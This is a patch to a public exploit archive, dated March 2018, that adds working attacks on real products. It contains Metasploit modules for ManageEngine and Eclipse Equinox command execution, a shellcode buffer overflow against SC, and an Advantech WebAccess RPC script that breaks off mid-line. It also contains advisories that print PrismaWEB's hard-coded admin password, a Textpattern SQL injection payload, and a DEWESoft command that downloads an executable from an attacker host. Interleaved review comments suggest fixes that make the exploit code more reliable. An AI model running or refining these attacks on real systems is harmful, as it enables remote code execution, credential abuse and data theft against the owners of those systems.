From 3f6d16d5c317673eb92c7c41b9253d4e5001fa8a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 13 Mar 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-03-13 8 changes to exploits/shellcodes Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader SC 7.16 - Stack-Based Buffer Overflow DEWESoft X3 SP1 (64-bit) - Remote Command Execution Eclipse Equinoxe OSGi Console - Command Execution (Metasploit) ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit) Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials TextPattern 4.6.2 - 'qty' SQL Injection Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution --- exploits/java/webapps/44274.rb | 117 +++++++++++++++++++++++++++ exploits/linux/local/44279.py | 78 ++++++++++++++++++ exploits/multiple/remote/44280.rb | 118 ++++++++++++++++++++++++++++ exploits/multiple/webapps/44276.txt | 36 +++++++++ exploits/php/webapps/44277.txt | 87 ++++++++++++++++++++ exploits/windows/remote/44275.txt | 100 +++++++++++++++++++++++ exploits/windows/webapps/44278.py | 74 +++++++++++++++++ exploits/windows/webapps/44281.txt | 90 +++++++++++++++++++++ files_exploits.csv | 10 ++- 9 files changed, 709 insertions(+), 1 deletion(-) create mode 100755 exploits/java/webapps/44274.rb create mode 100755 exploits/linux/local/44279.py create mode 100755 exploits/multiple/remote/44280.rb create mode 100644 exploits/multiple/webapps/44276.txt create mode 100644 exploits/php/webapps/44277.txt create mode 100644 exploits/windows/remote/44275.txt create mode 100755 exploits/windows/webapps/44278.py create mode 100644 exploits/windows/webapps/44281.txt diff --git a/exploits/java/webapps/44274.rb b/exploits/java/webapps/44274.rb new file mode 100755 index 000000000..60d809122 --- /dev/null +++ b/exploits/java/webapps/44274.rb 
@@ -0,0 +1,117 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Applications Manager Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in the ManageEngine Application Manager product. + An unauthenticated user can execute a operating system command under the context of privileged user. + + Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials + by accessing given system. This endpoint calls a several internal classes and then executes powershell script + without validating user supplied parameter when the given system is OfficeSharePointServer. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['CVE', '2018-7890'], + ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'RPORT' => 9090 + }, + 'Payload' => + { + 'BadChars' => "\x22" + }, + 'Platform' => ['win'], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => true, + 'DisclosureDate' => 'Mar 7 2018', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the application', '/']) + ] + ) + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), + 'vars_post' => { + 'method' => 'testCredentialForConfMonitors', + 'type' => 'OfficeSharePointServer', + 'montype' => 'OfficeSharePointServer', + 'isAgentEnabled' => 'NO', + 'isAgentAssociated' => 'false', + 
'displayname' => Rex::Text.rand_text_alpha(10), + 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... + 'Version' => '2013', + 'Powershell' => 'True', # :-) + 'CredSSP' => 'False', + 'SPType' => 'SPServer', + 'CredentialDetails' => 'nocm', + 'Password' => Rex::Text.rand_text_alpha(3), + 'UserName' => Rex::Text.rand_text_alpha(3) + } + }) + if res && res.body.include?('Kindly check the credentials and try again') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + + powershell_options = { + encode_final_payload: true, + remove_comspec: true + } + p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options) + + print_status('Triggering the vulnerability') + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), + 'vars_post' => { + 'method' => 'testCredentialForConfMonitors', + 'type' => 'OfficeSharePointServer', + 'montype' => 'OfficeSharePointServer', + 'isAgentEnabled' => 'NO', + 'isAgentAssociated' => 'false', + 'displayname' => Rex::Text.rand_text_alpha(10), + 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... + 'Version' => '2013', + 'Powershell' => 'True', # :-) + 'CredSSP' => 'False', + 'SPType' => 'SPServer', + 'CredentialDetails' => 'nocm', + 'Password' => Rex::Text.rand_text_alpha(3), + 'UserName' => "$(#{p})" + } + }) + + end +end \ No newline at end of file diff --git a/exploits/linux/local/44279.py b/exploits/linux/local/44279.py new file mode 100755 index 000000000..d97d8c327 --- /dev/null +++ b/exploits/linux/local/44279.py 
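Review bot: The `vars_post` hash is written out twice, once in `check` and again in `exploit`, with `UserName` as the only entry that differs, so the two requests can drift apart silently; a small helper that builds the body from the user name keeps them in step. `exploit` also discards the return of `send_request_cgi`, so a closed port or proxy error is indistinguishable from a trigger until `WfsDelay` expires; `res = send_request_cgi(...)` followed by `fail_with(Failure::Unreachable, "#{peer} - No response") unless res` reports the failure explicitly. The description block would also read better as `execute an operating system command` and `calls several internal classes`.
```ruby
  # POST body accepted by testCredential.do; check and exploit differ only in UserName.
  def credential_vars(user_name)
    {
      'method' => 'testCredentialForConfMonitors',
      'type' => 'OfficeSharePointServer',
      # … unchanged: the remaining fixed entries from check's vars_post …
      'Password' => Rex::Text.rand_text_alpha(3),
      'UserName' => user_name
    }
  end

  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => credential_vars(Rex::Text.rand_text_alpha(3))
    })
    # … unchanged: response body check …
  end

  def exploit
    # … unchanged: powershell_options and cmd_psh_payload …
    print_status('Triggering the vulnerability')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => credential_vars("$(#{p})")
    })
    fail_with(Failure::Unreachable, "#{peer} - No response") unless res
  end
```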
@@ -0,0 +1,78 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com +# Bug found using Exploit Pack - Local fuzzer feature. +# +# Tested on: GNU/Linux - Kali Linux +# Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb +# +# Description: SC v7.16 is prone to a basic stack-based buffer overflow +# vulnerability because the application fails to perform adequate +# boundary-checks on user-supplied input. +# +# An attacker could exploit this issue to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: SC v7.16 - +http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html +# +# +#[----------------------------------registers-----------------------------------] +#EAX: 0x0 +#EBX: 0x41414141 ('AAAA') +#ECX: 0x42 ('B') +#EDX: 0x1 +#ESI: 0x41414141 ('AAAA') +#EDI: 0x41414141 ('AAAA') +#EBP: 0x41414141 ('AAAA') +#ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047) +#EIP: 0x41424344 ('DCBA') +#EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT +direction overflow) +#[-------------------------------------code-------------------------------------] +#Invalid $PC address: 0x41424344 +#[------------------------------------stack-------------------------------------] +#0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047) +#0004| 0xbfffee34 --> 0x1 +#0008| 0xbfffee38 --> 0x0 +#0012| 0xbfffee3c --> 0x0 +#0016| 0xbfffee40 --> 0xf63d4e2e +#0020| 0xbfffee44 --> 0xb7fe4bf9 (: add esp,0x20) +#0024| 0xbfffee48 --> 0x1 +#0028| 0xbfffee4c --> 0x1 +#[------------------------------------------------------------------------------] +#Legend: code, data, rodata, value +#Stopped reason: SIGSEGV +#0x41424344 in ?? () +#gdb-peda$ backtrace +##0 0x41424344 in ?? () +##1 0xbffff100 in ?? () +#Backtrace stopped: previous frame inner to this frame (corrupt stack?) 
+#gdb-peda$ +# +#==2332== +#==2332== Jump to the invalid address stated on the next line +#==2332== at 0x41424344: ??? +#==2332== Address 0x41424344 is not stack'd, malloc'd or (recently) free'd +#==2332== +#==2332== +#==2332== Process terminating with default action of signal 11 (SIGSEGV) +#==2332== Access not within mapped region at address 0x41424344 +#==2332== at 0x41424344: ??? +import subprocess +import os + +buffersize = 1052 +nopsled = "\x90" +# Shell +shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" +eip = "\x10\xf0\xff\xbf" +buffer = nopsled * (buffersize-len(shellcode)) + eip + +try: + subprocess.call(["/usr/bin/sc", buffer]) +except OSError as e: + if e.errno == os.errno.ENOENT: + print "SC binary not found!" + else: + print "Error executing exploit" + raise \ No newline at end of file diff --git a/exploits/multiple/remote/44280.rb b/exploits/multiple/remote/44280.rb new file mode 100755 index 000000000..77273245c --- /dev/null +++ b/exploits/multiple/remote/44280.rb 
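Review bot: `os.errno.ENOENT` in the `except OSError` branch relies on an undocumented attribute that CPython removed in 3.7, so on a current interpreter the handler itself raises `AttributeError` and hides the original error; import the module directly with `import errno` and compare `if e.errno == errno.ENOENT:`. The paren-less `print` statements pin the script to Python 2, which the header comments do not state, so a `#!/usr/bin/python2` shebang or a `# Python 2 only` note would spare the next reader a confusing `SyntaxError`. `buffer` also shadows a Python 2 builtin; a name such as `payload` avoids that.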
@@ -0,0 +1,118 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +require 'base64' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + + TELNET_IAC = Msf::Exploit::Remote::Telnet + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Eclipse Equinoxe OSGi Console Command Execution', + 'Description' => %q{ + Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console + 'fork' command to execute arbitrary commands on the remote system.. + }, + 'Author' => + [ + 'Quentin Kaiser ' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php'] + ], + 'Platform' => %w{ linux win }, + 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64], + 'Targets'=> [ + [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ], + [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ] + ], + 'CmdStagerFlavor' => [ 'bourne' ], + 'DisclosureDate' => 'Feb 13 2018', + 'DefaultTarget' => 0)) + deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH') + register_options([ + OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20]) + ]) + end + + def check + connect + res = sock.get_once + if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\ + TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE + # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72 + sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\ + "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE) + res = sock.get_once + end + disconnect + if res && res == "osgi> " + return Exploit::CheckCode::Vulnerable + 
end + Exploit::CheckCode::Safe + end + + def exploit + begin + print_status("Accessing the OSGi console ...") + + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console") + end + + if target['Platform'] == "win" then + exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"") + else + execute_cmdstager({:flavor => :bourne}) + end + + print_status("#{rhost}:#{rport} - Waiting for session...") + + (datastore['TIME_WAIT']).times do + Rex.sleep(1) + # Success! session is here! + break if session_created? + end + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e + fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}") + ensure + disconnect + end + end + + def exec_command(cmd) + connect + res = sock.get_once + if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\ + TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE + sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\ + "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE) + res = sock.get_once + end + print_status("Exploiting...") + sock.put("#{cmd}\r\n") + res = sock.get + sock.put("disconnect\r\n") + res = sock.get + sock.put("y\r\n") + end + + def execute_command(cmd, opts={}) + cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "") + # Runtime.getRuntime().exec() workaround on Linux. Requires bash. + exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"") + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/44276.txt b/exploits/multiple/webapps/44276.txt new file mode 100644 index 000000000..56f383178 --- /dev/null +++ b/exploits/multiple/webapps/44276.txt 
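Review bot: The telnet option-negotiation block (compare the greeting, answer with the terminal-type subnegotiation, read again) is duplicated verbatim between `check` and `exec_command`, so a fix to one copy will not reach the other; hoisting the expected greeting into a constant and the reply into a `negotiate_telnet` helper leaves each caller with a single line. In `exec_command` the two `res = sock.get` assignments are never read, so bare `sock.get` calls state the intent more honestly, and the `then` after `if target['Platform'] == "win"` is redundant in Ruby. The constant named `TELNET_IAC` holds the whole `Msf::Exploit::Remote::Telnet` mixin rather than the IAC byte, so a name such as `TELNET` would describe it better. The module name and description spell the project `Equinoxe` while upstream spells it Equinox, and the description's trailing `..` should be a single period.
```ruby
  # Option negotiation the console sends before its prompt.
  TELNET_GREETING = TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
    TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
    TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
    TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE

  # Answer the negotiation if it is present and return what the console sent next.
  def negotiate_telnet
    res = sock.get_once
    if res == TELNET_GREETING
      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
               "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
      res = sock.get_once
    end
    res
  end

  def check
    connect
    res = negotiate_telnet
    disconnect
    # … unchanged: prompt comparison …
  end

  def exec_command(cmd)
    connect
    negotiate_telnet
    # … unchanged: command send and disconnect sequence …
  end
```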
@@ -0,0 +1,36 @@ +Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass + + +Vendor: Prisma Industriale S.r.l. +Product web page: https://www.prismaindustriale.com +Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??) + +Summary: Web Administration of Machine. + +Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing +an attacker to effectively bypass authentication of PrismaWEB with administrator +privileges. The credentials can be disclosed by simply navigating to the login_par.js +JavaScript page that holds the username and password for the management interface that +are being used via the Login() function in /scripts/functions_cookie.js script. + +Tested on: HMS AnyBus-S WebServer + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5453 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php + +06.02.2018 + +--- + + +$ curl http://10.10.10.70/user/scripts/login_par.js +// JavaScript Document +// 11 Dicembre 2009 Release 1.0 Rev.10 + +var txtChkUser = "prismaweb"; // Nome utente Login +var txtChkPassword = "prisma"; // Password Login \ No newline at end of file diff --git a/exploits/php/webapps/44277.txt b/exploits/php/webapps/44277.txt new file mode 100644 index 000000000..1e30617ef --- /dev/null +++ b/exploits/php/webapps/44277.txt 
@@ -0,0 +1,87 @@ +============================================= +MGC ALERT 2018-002 +- Original release date: February 12, 2018 +- Last revised: March 12, 2018 +- Discovered by: Manuel García Cárdenas +- Severity: 7,1/10 (CVSS Base Score) +- CVE-ID: CVE-2018-7474 +============================================= + +I. VULNERABILITY +------------------------- +SQL Injection in Textpattern <= 4.6.2 + +II. BACKGROUND +------------------------- +Textpattern is a free and open-source content management system (CMS) based +on PHP and MySQL, originally developed by Dean Allen and now developed by +Team Textpattern. + +III. DESCRIPTION +------------------------- +This bug was found using the portal with authentication as administrator. + +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. + +It is possible to inject SQL code in the variable "qty" on the page +"index.php". + +IV. PROOF OF CONCEPT +------------------------- +The following URL's and parameters have been confirmed to all suffer from +SQL injection. + +/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 + +Note: the variable "_txp_token" doest not work as a anti-csrf. + +POC: + +/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'% +5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Textpattern <= 4.6.2 + +VII. SOLUTION +------------------------- +Disable website until a fix is available. + +VIII. REFERENCES +------------------------- +https://textpattern.com/ + +IX. 
CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +February 12, 2018 1: Initial release +March 12, 2018 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas +February 12, 2018 2: Send to vendor without response +February 26, 2018 3: Second email to vendor without response +March 12, 2018 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/windows/remote/44275.txt b/exploits/windows/remote/44275.txt new file mode 100644 index 000000000..bfd389f91 --- /dev/null +++ b/exploits/windows/remote/44275.txt 
@@ -0,0 +1,100 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt +[+] ISR: Apparition Security + + + +Vendor: +============= +www.dewesoft.com + + +Product: +=========== +DEWESoft X3 SP1 (64-bit) installer - X3 +DEWESoft_FULL_X3_SP1_64BIT.exe + + + +Vulnerability Type: +=================== +Remote Internal Command Access + + + +CVE Reference: +============== +CVE-2018-7756 + + + +Security Issue: +================ +The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication +for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a +RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run +a "SETFIREWALL Off" command. + +The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install. + +Internal commands used by "RunExeFile.exe" for which I could not find any documentation. + +RUN +RUNEX +GETFIREWALL +SETFIREWALL Off +KILL +USERNAME +SHUTDOWN +SENDKEYS +LIST +DWPIPE + +Exploit/POC: +============= +TELNET x.x.x.x 1999 +RUN calc.exe + +OR + +Launch the victims browser and send them to website for a drive-by download etc. + +TELNET x.x.x.x 1999 +RUN http://ATTACKER-IP/DOOM.exe + +Then from the TELNET session execute it from Downloads directory. + +runexe c:\Users\victim\Downloads\DOOM.exe + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: February 9, 2018 +Vendor "thank you for the warning. 
We will forward this to the developers and they will look into it" : February 19, 2018 +Inform vendor of disclosure timeline : February 19, 2018 +No further replys, update or addressing of the issue by vendor. +Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018 +March 10, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/exploits/windows/webapps/44278.py b/exploits/windows/webapps/44278.py new file mode 100755 index 000000000..4ee3914c7 --- /dev/null +++ b/exploits/windows/webapps/44278.py 
@@ -0,0 +1,74 @@ +#!/usr/bin/python2.7 + +# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability +# Date: 03-11-2018 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: www.advantech.com +# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe +# Version: Advantech WebAccess 8.2-2017.08.18 +# Tested on: Windows Server 2008 R2 Enterprise 64-bit +# CVE : CVE-2017-16720 +# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/ + +import sys, struct +from impacket import uuid +from impacket.dcerpc.v5 import transport + +def call(dce, opcode, stubdata): + dce.call(opcode, stubdata) + res = -1 + try: + res = dce.recv() + except Exception, e: + print "Exception encountered..." + str(e) + sys.exit(1) + return res + +if len(sys.argv) != 2: + print "Provide only host arg" + sys.exit(1) + +port = 4592 +interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc" +version = "1.0" + +host = sys.argv[1] + +string_binding = "ncacn_ip_tcp:%s" % host +trans = transport.DCERPCTransportFactory(string_binding) +trans.set_dport(port) + +dce = trans.get_dce_rpc() +dce.connect() + +print "Binding..." +iid = uuid.uuidtup_to_bin((interface, version)) +dce.bind(iid) + +print "...1" +stubdata = struct.pack("